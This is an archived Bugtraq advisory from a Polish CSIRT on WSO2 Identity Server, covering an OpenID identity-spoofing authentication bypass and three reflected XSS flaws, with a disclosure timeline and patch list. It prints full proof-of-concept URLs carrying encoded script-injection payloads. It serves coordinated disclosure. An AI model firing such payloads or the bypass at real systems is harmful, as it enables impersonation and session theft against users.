lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite for Android: free password hash cracker in your pocket
[<prev] [next>] [day] [month] [year] [list] 
Date: Wed, 25 Mar 2015 16:01:25 +0100
From: Bartlomiej Balcerek <Bartlomiej.Balcerek@....edu.pl>
To: bugtraq@...urityfocus.com
Subject: WSO2 Identity Server multiple vulnerabilities

Hi,

WSO2 Identity Server (http://wso2.com/products/identity-server/) version
4.5.0/4.6.0/5.0.0 is prone to multiple vulnerabilities, including
authentication bypass.

Timeline:

09.10.2014 - Vendor notified
22.11.2014 - Vendor confirmed
04.12.2014 - Patches released
25.03.2015 - Bugtraq disclosure

Vulnerable versions:

IS 4.5.0
IS 4.6.0
IS 5.0.0

Fixed versions:

IS 4.5.0 + WSO2-CARBON-PATCH-4.2.0-0932
IS 4.6.0 + WSO2-CARBON-PATCH-4.2.0-0933
IS 5.0.0 + WSO2-CARBON-PATCH-4.2.0-0930
IS 5.0.0 + Service Pack 1

Vulnerabilities details:

1) Identity spoofing/authentication bypass.  Attacker need to log in to
WSO2 IS to obtain valid HTTP session. Given this session he/she can
request OpenID assertion from WSO2 IS to _any_ identity
(openid.identity). Thus any authenticated user is able to spoof any
identity he/she requests, in order to login to RP as user of his/her will.

2) XSS A - HTML injection

https://<wso2is_address>/openid/%3cIMG%20SRC%3d%22a%22%20onerror=alert(%22XSS%22)%3e

3) XSS B - HTML injection

https://<wso2is_address>/authenticationendpoint/login.do?openid.ns=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0&openid.mode=checkid_setup&openid.return_to=http://example.com&openid.realm=http://example.com&openid.ns.ax=http%3A%2F%2Fopenid.net%2Fsrv%2Fax%2F1.0&openid.ax.mode=fetch_request&openid.identity=https://example.com/test&openid.claimed_id=https://example.com/test&relyingParty=https://ww.wp.pl&sessionDataKey=186f35c3-f2a3-49bf-8bb2-7b6a1e%27%2f%3e%3c%73%63%72%69%70%74%3eeval("ale"%2b"rt(1)")%3c%2f%73%63%72%69%70%74%3e&type=openid&commonAuthCallerPath=%2Fopenidserver&username=test&authenticators=BasicAuthenticator:LOCAL

4) XSS C - JavaScript injection

https://<wso2is_address>/authenticationendpoint/login.do?openid.ns=http%3A%2F%2Fspecs.openid.net%2Fauth%2F2.0&openid.mode=checkid_setup&openid.return_to=http://example.com&openid.realm=http://example.com&openid.ns.ax=http%3A%2F%2Fopenid.net%2Fsrv%2Fax%2F1.0&openid.ax.mode=fetch_request&openid.identity=https://example.com/test&openid.claimed_id=https://example.com/test&relyingParty=https://ww.wp.pl&sessionDataKey=186f35c3-f2a3-49bf-8bb2-7b6a1e-aaa"%0a};alert(1);%0aif(0){"&type=openid&commonAuthCallerPath=%2Fopenidserver&username=test&authenticators=BasicAuthenticator:LOCAL

regards
-- 
Bartlomiej Balcerek
WCSS CSIRT
Wroclaw Centre for Networking and Supercomputing
Wroclaw University of Technology, Poland
phone: +48 (71) 320-20-79 mail: bartol@....edu.pl




Download attachment "signature.asc" of type "application/pgp-signature" (837 bytes)

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ